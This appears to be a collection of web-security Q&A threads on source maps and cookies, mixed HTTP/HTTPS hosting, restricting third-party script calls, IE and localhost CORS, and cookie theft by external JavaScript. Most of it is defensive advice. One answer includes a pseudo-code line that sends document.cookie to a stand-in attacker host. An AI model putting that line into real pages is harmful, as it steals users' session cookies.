Regarding source maps, I came across a strange behavior in chromium (build 181620).
In my app I'm using minified jquery and after logging-in, I started seeing HTTP requests for "jquery.min.map" in server log file. Those requests were lacking cookie headers (all other requests were fine).
Those requests are not even exposed in net tab in Developer tools (which doesn't bug me that much).
The point is, js files in this app are only supposed to be available to logged-in clients, so in this setup, the source maps either won't work or I'd have to change the location of source map to a public directory.
My question is: is this a desired behavior (meaning - source map requests should not send cookies) or is it a bug in Chromium?
The String InspectorFrontendHost::loadResourceSynchronously(const String& url) implementation in InspectorFrontendHost.cpp, which is called for loading sourcemap resources, uses the DoNotAllowStoredCredentials flag, which I believe results in the behavior you are observing.
This method is potentially dangerous, so this flag is there for us (you) to be on the safe side and avoid leaking sensitive data.
As a side note, giving jquery.min.js out only to logged-in users (that is, not from a cookieless domain) is not a very good idea to deploy in the production environment. I;m not sure about your idea behind this, but if you definitely need to avoid giving the file to clients not visiting your site, you may resort to checking the Referer HTTP request header.
I encountered this problem and became curious as to why certain authentication cookies were not sent in requests for .js.map files to our application.
In my testing using Chrome 71.0.3578.98, if the SameSite cookie atttribute is set to either strict or lax for a cookie, Chrome will not send that cookie when requesting the .js.map file. When there is no sameSite restriction, the cookie will be sent.
I'm not aware of any specification of the intended behavior.
Related
If I have an HTML page served over HTTP at http://example.com:123, and another served over HTTPS at https://example.com:456/some_app, is there any risk to the HTTPS app? Note that the following mitigations are assumed to be in place:
The HTTP page is entirely unauthenticated and contains public information
The cookies for the HTTPS page are marked secure
The HTTPS page uses a standard anti-CSRF patter such as double submit
The main risk that I see is that an attacker could intercept the HTTP request and send back a page with malicious Javascript. While this is undesirable, I can't see any way that the attack could escalate. Despite the the overly permissive access controls on cookies, the attacker should not be able to steal the HTTPS page's cookies, because they are marked secure. As far as cross origin requests go, requests made by the HTTP page are considered as coming from a different origin, so the CSRF protections work there.
Are there any attack venues that I'm missing? Or is the HTTPS app reasonably safe?
The "secure" attribute of cookies prevents the cookies being sent with a http request so they are only sent with https. However there is nothing to prevent javascript on the http page reading the cookie if, for example, it has been tampered with either in transit to include extra javascript or was vulnerable to a XSS flaw.
This could be remediated by setting the HttpOnly flag as well as the secure flag but that will may not work for your Double protection CSRF implementation if JavaScript is needed to read the cookie.
EDIT: Comments below state that Chrome (at least) prevents this when Secure flag is set but I cannot see this explicitly called out in the RFC and in fact section 8.5 states that cookies do not always follow the same restrictions for scheme and path when accessed through document.cookie. It also gives the example of path restrictions being ignored when accessed locally using document.cookie - though admittedly doesn't explicitly mention whether Secure cookies can be read from javascript on non-https pages. I would err on the cautious side and so assume they are not secure from javascript on http pages unless HttpOnly flag is set.
The other issue is that there is nothing to stop the Http page setting the cookie, and overwriting the existing one. Again this could be achieved by intercepting the http page response and adding a Set-Cookie header, or by using javascript on the page of vulnerable to XSS. While you might think overwriting a cookie wouldn't cause too many problems it could log you in as someone else for example without the person realising at which point they might enter other private data under this incorrect login.
Of course your https page could also be vulnerable to XSS too but the interception attacks mention are only an issue on unsecured http (and I'm including poorly configured https in that btw). Additionally http pages are typically handled with less care by users and developers alike and also load insecure third party content without error. So could be more vulnerable to XSS or other issues.
This is not to mention the fact that, with only a port number difference, your http site could be intercepted and made to look like your https site as a phishing site in the hope your visitors are happy with the server name and don't notice the incorrect port.
And those are just a few issues I can think of.
I would strongly advise not allowing http and https on the same server name, would suggest https everywhere and even go as far as recommending HSTS to ensure this.
I have some HTML/PHP pages that include javascript calls.
Those calls points on JS/PHP methods included into a library (PIWIK) stored onto a distant server.
They are triggered using an http://www.domainname.com/ prefix to point the correct files.
I cannot modify the source code of the library.
When my own HTML/PHP pages are locally previewed within a browser, I mean using a c:\xxxx kind path, not a localhost://xxxx one, the distant script are called and do their process.
I don't want this to happen, only allowing those scripts to execute if they are called from a www.domainname.com page.
Can you help me to secure this ?
One can for sure directly bypass this security modifying the web pages on-the-fly with some browser add-on while browsing the real web site, but it's a little bit harder to achieve.
I've opened an issue onto the PIWIK issue tracker, but I would like to secure and protect my web site and the according statistics as soon as possible from this issue, waiting for a further Piwik update.
EDIT
The process I'd like to put in place would be :
Someone opens a page from anywhere than www.domainname.com
> this page calls a JS method on a distant server (or not, may be copied locally),
> this script calls a php script on the distant server
> the PHP script says "hey, from where damn do yo call me, go to hell !". Or the PHP script just do not execute....
I've tried to play with .htaccess for that, but as any JS script must be on a client, it blocks also the legitimate calls from www.domainname.com
Untested, but I think you can use php_sapi_name() or the PHP_SAPI constant to detect the interface PHP is using, and do logic accordingly.
Not wanting to sound cheeky, but your situation sounds rather scary and I would advise searching for some PHP configuration best practices regarding security ;)
Edit after the question has been amended twice:
Now the problem is more clear. But you will struggle to secure this if the JavaScript and PHP are not on the same server.
If they are not on the same server, you will be reliant on HTTP headers (like the Referer or Origin header) which are fakeable.
But PIWIK already tracks the referer ("Piwik uses first-party cookies to keep track some information (number of visits, original referrer, and unique visitor ID)" so you can discount hits from invalid referrers.
If that is not enough, the standard way of being sure that the request to a web service comes from a verified source is to use a standard Cross-Site Request Forgery prevention technique -- a CSRF "token", sometimes also called "crumb" or "nonce", and as this is analytics software I would be surprised if PIWIK does not do this already, if it is possible with their architecture. I would ask them.
Most web frameworks these days have CSRF token generators & API's you should be able to make use of, it's not hard to make your own, but if you cannot amend the JS you will have problems passing the token around. Again PIWIK JS API may have methods for passing session ID's & similar data around.
Original answer
This can be accomplished with a Content Security Policy to restrict the domains that scripts can be called from:
CSP defines the Content-Security-Policy HTTP header that allows you to create a whitelist of sources of trusted content, and instructs the browser to only execute or render resources from those sources.
Therefore, you can set the script policy to self to only allow scripts from your current domain (the filing system) to be executed. Any remote ones will not be allowed.
Normally this would only be available from a source where you get set HTTP headers, but as you are running from the local filing system this is not possible. However, you may be able to get around this with the http-equiv <meta> tag:
Authors who are unable to support signaling via HTTP headers can use tags with http-equiv="X-Content-Security-Policy" to define their policies. HTTP header-based policy will take precedence over tag-based policy if both are present.
Answer after question edit
Look into the Referer or Origin HTTP headers. Referer is available for most requests, however it is not sent from HTTPS resources in the browser and if the user has a proxy or privacy plugin installed it may block this header.
Origin is available for XHR requests only made cross domain, or even same domain for some browsers.
You will be able to check that these headers contain your domain where you will want the scripts to be called from. See here for how to do this with htaccess.
At the end of the day this doesn't make it secure, but as in your own words will make it a little bit harder to achieve.
The Very Short Version: is anybody successfully requesting local resources via AJAX, in IE, over SSL? I cannot solve getting an "access denied" error.
The Longer Version:
I am using AJAX to retrieve JSON from an application that runs a local web service. The web service channel is encrypted so that if the remote site is being served over HTTPS, no "insecure resource on a secure page" errors appear.
So, in the address bar is a remote site of some sort... mysite.com. It is receiving information from https://localhost/.
The web service is setting correct headers for CORS and everything works in Chrome and Firefox. In IE, if I put my https://localhost resource into the address bar, the correct resource is returned and displayed. However, when using AJAX (not just the address bar), a security setting in IE is denying access. This is documented (in part) here:
Access denied in IE 10 and 11 when ajax target is localhost
The only proper solution in one reply is to add the requesting domain (mysite.com in this case) to the trusted sites. This works, but we would prefer to not have user intervention... pointing to a knowledge base article on how to add a trusted site is hardly a great user experience. The other replies to that question are invalid for the same reasons as below-->
Some more stumbling around and I discovered this:
CORS with IE, XMLHttpRequest and ssl (https)
Which had a reply containing a wrapper for AJAX requests in IE. It seemed promising, but as it turns out, IE11 has now deprecated the XDomainRequest API. This was probably the right thing for Microsoft to do... but now the "hack" workaround of adding a void onProgress handler to the XDR object is obviously not an option and the once-promising workaround wrapper is rendered null and void.
Has anybody come across either:
a) a way to get those requests through without needing to modify the trusted sites in IE? In other words, an updated version of the workaround in the second link?
b) as a "next best" case: a way to prompt the user to add the site to their trusted zone? "mysite.com wishes to be added to your trusted zones. Confirm Yes/No" and have it done, without them actually needing to open up their native settings dialogues and doing it manually?
For security reasons, Internet Explorer's XDomainRequest object blocks access (see #6 here) to the Intranet Zone from the Internet Zone. I would not be surprised to learn that this block was ported into the IE10+ CORS implementation for the XMLHTTPRequest object.
One approach which may help is to simply change from localhost to 127.0.0.1 as the latter is treated as Internet Zone rather than Intranet Zone and as a consequence the zone-crossing is avoided.
However, you should be aware that Internet Explorer 10+ will block all access to the local computer (via any address) when a site is running in Enhanced Protected Mode (EPM)-- see "Loopback blocked" in this post. Currently, IE uses EPM only for Internet sites when run in the Metro/Immersive browsing mode (not in Desktop) but this could change in the future.
No, there's no mechanism to show the Zones-Configuration UI from JavaScript or to automatically move a site from one zone to another. However, the fact that you have a local server implies that you are running code on the client already, which means you could use the appropriate API to update the Zone Mapping on the client. Note that such a change requires that you CLEARLY obtain user permission first, lest your installer be treated as malware by Windows Defender and other security products.
So, in summary, using the IP address should serve as a workaround for many, but not all platforms.
Since those are two different domains, one solution would be to create an application which proxies the requests in the direction you want.
If you have control over the example.com end, and want to support users who bring their own localhost service, this would be harder, as you would have to provide more requirements for what they bring.
If however, you have control over what runs in localhost, and want to access example.com, and have it access the localhost service, set up redirection in your web server of preference, or use a reverse proxy. You could add an endpoint to the same localhost app which doesn't overlap paths, for example, route http://localhost/proxy/%1 to http://%1, leaving the rest of localhost alone. Or, run a proxy on e.g. http://localhost:8080 which performs a similar redirection, and can serve example.com from a path, and the API from another.
This winds up being a type of "glue" or integration code, which should allow you to mock interactions up to a point.
I'm writing a web app with Javascript which needs to access a third-party API (located on x.apisite.com and y.apisite.com). I was using XMLHTTPRequest, but when serving the files from my own local server, this fails because of the same-origin policy.
Now, this web app is supposed to be installed on my mobile device, where any downloaded files will be cached. So, I changed my DNS entries to point x.apisite.com and y.apisite.com to my own local server. I then download the files and then change the DNS entries back to the correct ones. I thought that since the browser thinks that the scripts were downloaded from *.apisite.com, I could now make XMLHTTPRequests to *.apisite.com. However, this does not seem to be the case, I still get same-origin policy errors.
What am I doing wrong?
Here's the basic idea of what I'm doing:
<!DOCTYPE html>
<html>
<head>
<!-- this will actually be downloaded from my own local server -->
<script src="http://x.apisite.com/script-0.js">
<script src="http://y.apisite.com/script-1.js">
...
In script-0.js, I make an XMLHTTPRequest to x.apisite.com, and likewise in script-1.js, I access y.apisite.com.
Practical answer (not recommended): Create CNAME records to the third-party domains from domains that you control, then use those domains and hope that the hosts of the third-party aren't looking at the HTTP Host header. Note that this wouldn't work if the clients attempt to authenticate the third-party hosts either; for example when using HTTPS (some client browsers may force the use of HTTPS in certain scenarios).
Ideal answer: Ask the third-party to authorize requests made by code that came from your origin domain using CORS (some hosts already allow requests from code from any origin, you should check that).
Alternative: If the third-party doesn't want to give clients the go-ahead to make cross-origin requests with code from your domain, then you have to make those requests yourself (from your server). The code you send to the client browsers will then only interact with the same origin, but this also means that users will have to trust you with their credentials if you're proxying requests for them (if that's relevant), or you must have credentials of your own to authenticate your server to the third-party hosts, which allow you to do whatever it is you want to do there. It also means you take the traffic load as well, which may or may not be heavy depending on the application. There are potentially many other implications, which all derive from the fact that you explicitly take responsibility for these requests.
Note: While this may sound a bit complicated, it may be useful to understand the trust mechanics between the user, the user's client browser, the code executing in the browser, the origin of that code, and the domains to which that code makes requests. Always keep in mind the best interests of each party in mind and it'll be easy to find a solution for your specific problem.
Final answer (everybody hates it, but you probably expected it): "It depends on what exactly you're trying to do." (Sorry.)
Meaning if I have a website and I link to a external .js file, say for jquery or some widget service, they can pretty easy just pull by authentication cookie and then login as me correct?
What if I am under SSL?
If you include Javascript or JSONP code from another domain, that code has full client-side power and can do whatever it wants.
It can send AJAX requests to automatically make your user do things, and it can steal document.cookie.
If your authentication cookies are HTTP-only, it can't steal them, but it can still impersonate the user using AJAX.
Never include a JS file from a domain you don't trust.
If your page uses SSL, all Javascript files must also use SSL, or an attacker can modify the un-encrypted Javascript to do whatever he wants.
For this reason, browsers will show a security warning if an SSL page uses non-SSL resources.
Note that JSONP is no exception to this rule.
Any JSONP response has full access to your DOM.
If security is a concern, do not use untrusted JSONP APIs.
I can only agree with SLaks and Haochi (+1 and all).
It is extremely insecure and you should never do it even if you trust the domain. Don't trust the answers that tell you that this is not the case because they are just wrong.
This is why now literally all of the links to JavaScript libraries hosted on Google's CDN on the Developer's Guide to Google Libraries API are secure HTTPS links, even though encrypting all of that traffic means a huge overhead even for Google.
They used to recommend using HTTPS only for websites that use HTTPS themselves, now there are no HTTP links in the examples at all.
The point is that you can trust Google and their CDN, but you can never trust the local dns and routers in some poor schmuck's cafe from which your visitors may be connecting to your website and Google's CDN is a great target for obvious reasons.
It depends on what do you mean by "pull". As others have said here, cookies are only sent to where it is originated from. However, a third-party (with malicious intent) file, can still send your cookies back to their server by executing some JavaScript code like
// pseudo-code
cookie_send("http://badguy.tld/?"+document.cookies)
So, only include scripts from trusted sources (Google, Facebook, etc)
No, because cookies for your site will only be sent to your domain.
For example when your browser sees yoursite.com it will send the authentication cookie for yoursite.com. If it also has to make a different request for jquery (for the .js script) it won't send the cookie for yoursite.com (but it will send a jquery cookie - assuming one exists).
Remember every resource is a seperate request under HTTP.
I am not sure HttpOnly is fully supported across all browsers, so I wouldn't trust it to prevent attacks by itself.
If you're worried about a 3rd party attacker (i.e., not the site offering the JS file) grabbing the cookies, definitely use SSL and secure cookies.
If your page isn't running on SSL, using HttpOnly cookies doesn't actually prevent a man-in-the-middle attack, since an attacker in the middle can intercept the cookies regardless by just pretending to be your domain.
If you don't trust the host of an external .js file, don't use the external .js file. An external js file can rewrite the entire page DOM to ask for a CC to be submitted to anyone and have it look (to an average user) the same as your own page, so you're pretty much doomed if you're getting malicious .js files. If you're not sure if a .js host is trustworthy, host a copy of it locally (and check the file for security holes) or don't use it at all. Generally I prefer the latter.
In the specific case of JQuery, just use the copy on Google's CDN if you can't find a copy you like better.
Cookies are domain specific, guarded by same origin policy.